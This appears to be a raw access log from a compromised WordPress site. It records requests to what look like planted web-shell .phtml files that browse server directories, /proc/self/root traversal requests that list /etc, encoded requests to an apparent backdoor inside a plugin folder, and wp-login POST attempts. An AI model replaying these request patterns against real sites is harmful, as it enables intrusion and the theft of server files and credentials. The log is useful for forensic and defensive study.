57.141.18.49 57.141.18.49 - - [20/Mar/2026:01:22:28 -0300] "GET /shop/chasmy/imploration012730221671.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/blocks HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.91 57.141.18.91 - - [20/Mar/2026:01:22:31 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/theme.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.40 57.141.18.40 - - [20/Mar/2026:01:22:32 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/deprecated.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.6 57.141.18.6 - - [20/Mar/2026:01:22:33 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-post-type.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.123 57.141.18.123 - - [20/Mar/2026:01:22:34 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-walker-comment.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:18:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333836352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303236352q3339323630393239396434626564396332396632623135353434353734373937222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:20:17 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938333935392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303335392q6335356233333131323937633737313237373963303730396564306165303062222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:20:47 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938343034302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303434302q3332303366633566393030623537653833363064616137323931366264323163222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:21:13 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938343036392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303436392q6638653831316337636263326334366264333563323362336136393335623736222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [20/Mar/2026:01:22:01 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938343039352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303439352q3862663064643438373937383730306634363536316162366462386533643961222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.243.128 - - [20/Mar/2026:01:27:05 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform/athlon-linux HTTP/1.1" 200 19603 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.96 57.141.18.96 - - [20/Mar/2026:01:27:06 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-http-ixr-client.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.241.31 - - [20/Mar/2026:01:27:05 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc HTTP/1.1" 200 440697 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.14 57.141.18.14 - - [20/Mar/2026:01:27:07 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/languages HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.118 57.141.18.118 - - [20/Mar/2026:01:27:08 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-theme-json-resolver.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.101 57.141.18.101 - - [20/Mar/2026:01:27:08 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.119 57.141.18.119 - - [20/Mar/2026:01:27:09 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/plugins HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.22 57.141.18.22 - - [20/Mar/2026:01:27:10 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class.wp-styles.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 13558 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.34 57.141.18.34 - - [20/Mar/2026:01:27:11 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-json.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.50 57.141.18.50 - - [20/Mar/2026:01:27:12 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-block-metadata-registry.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 17063 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.56 57.141.18.56 - - [20/Mar/2026:01:27:14 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/media-upload.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16281 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.119 57.141.18.119 - - [20/Mar/2026:01:27:16 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/comment.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 16230 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.42 57.141.18.42 - - [20/Mar/2026:01:27:15 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/editor-expand.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13014 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.52 57.141.18.52 - - [20/Mar/2026:01:27:18 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/feed-rdf.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.82 57.141.18.82 - - [20/Mar/2026:01:27:18 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-http-encoding.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.23 57.141.18.23 - - [20/Mar/2026:01:27:19 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/imabf56b HTTP/1.1" 200 16301 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.85 57.141.18.85 - - [20/Mar/2026:01:27:20 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/common.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 13007 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
179.188.53.243 - - [20/Mar/2026:01:22:23 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938343134332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303534332q3561633462336433636639613561353835663534616333303731376232353561222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
57.141.18.16 57.141.18.16 - - [20/Mar/2026:01:27:25 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-wp-http-requests-hooks.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 15287 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.83 57.141.18.83 - - [20/Mar/2026:01:27:34 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/css HTTP/1.1" 200 18701 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
186.202.163.107 - - [20/Mar/2026:01:28:00 -0300] "GET / HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0 Safari/537.36"
74.7.243.128 - - [20/Mar/2026:01:28:01 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform/alpha-linux HTTP/1.1" 200 19597 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.31 - - [20/Mar/2026:01:28:02 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/tmp HTTP/1.1" 200 53537 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.36 57.141.18.36 - - [20/Mar/2026:01:28:05 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/style-engine HTTP/1.1" 200 24265 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
194.163.161.202 - - [20/Mar/2026:01:28:12 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15"
194.163.161.202 - - [20/Mar/2026:01:28:14 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15"
57.141.18.67 57.141.18.67 - - [20/Mar/2026:01:28:27 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/nav-menu.min.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 51489 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.112 57.141.18.112 - - [20/Mar/2026:01:28:46 -0300] "GET /shop/louploup/preinstructed012048378661.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/site-health.js&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js HTTP/1.1" 200 26926 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.74.169 - - [20/Mar/2026:01:28:51 -0300] "GET /shop/necrophagous/quadrangle013449335933.phtml HTTP/1.1" 200 206919 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
179.188.53.243 - - [20/Mar/2026:01:23:55 -0300] "GET /wp-content/plugins/elementskit-lite/widgets/heading/assets/imagechoose/imagechoose/index.php?ARRAY=7o2230223n313737333938343136352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333938303536352q3338623037323663313035653364333663306638363634616336316638663630222p2232223n223637393337653235326539666531383532386538303730643138363836396533222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q33362q35392q36342q37372q38332q3138227q HTTP/1.1" 504 247 "-" "-"
74.7.241.31 - - [20/Mar/2026:01:28:56 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/boot/grub HTTP/1.1" 200 18058 "https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/boot" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.243.128 - - [20/Mar/2026:01:28:58 -0300] "GET /?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform/noarch-linux HTTP/1.1" 200 19602 "https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/rpm/platform" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.18.60 57.141.18.60 - - [20/Mar/2026:01:29:03 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/class-oembed.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 13618 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.215.11.230 - - [20/Mar/2026:01:29:12 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
162.215.11.230 - - [20/Mar/2026:01:29:13 -0300] "POST /wp-login.php HTTP/1.1" 200 75949 "https://bandeirantesbombas.com.br/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
57.141.18.41 57.141.18.41 - - [20/Mar/2026:01:29:16 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/rss-functions.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 13473 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
94.72.107.34 - - [20/Mar/2026:01:28:18 -0300] "GET /wp-login.php HTTP/1.1" 200 75949 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
66.249.74.160 - - [20/Mar/2026:01:29:22 -0300] "GET /shop/duumviral/impart013421852995.phtml HTTP/1.1" 200 213256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.18.4 57.141.18.4 - - [20/Mar/2026:01:29:28 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?fileloc=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/plugin.php&path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes HTTP/1.1" 200 49967 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.18.50 57.141.18.50 - - [20/Mar/2026:01:29:39 -0300] "GET /shop/permeance/selfcontrol01792521429.phtml?path=/home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/widgets HTTP/1.1" 200 48361 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
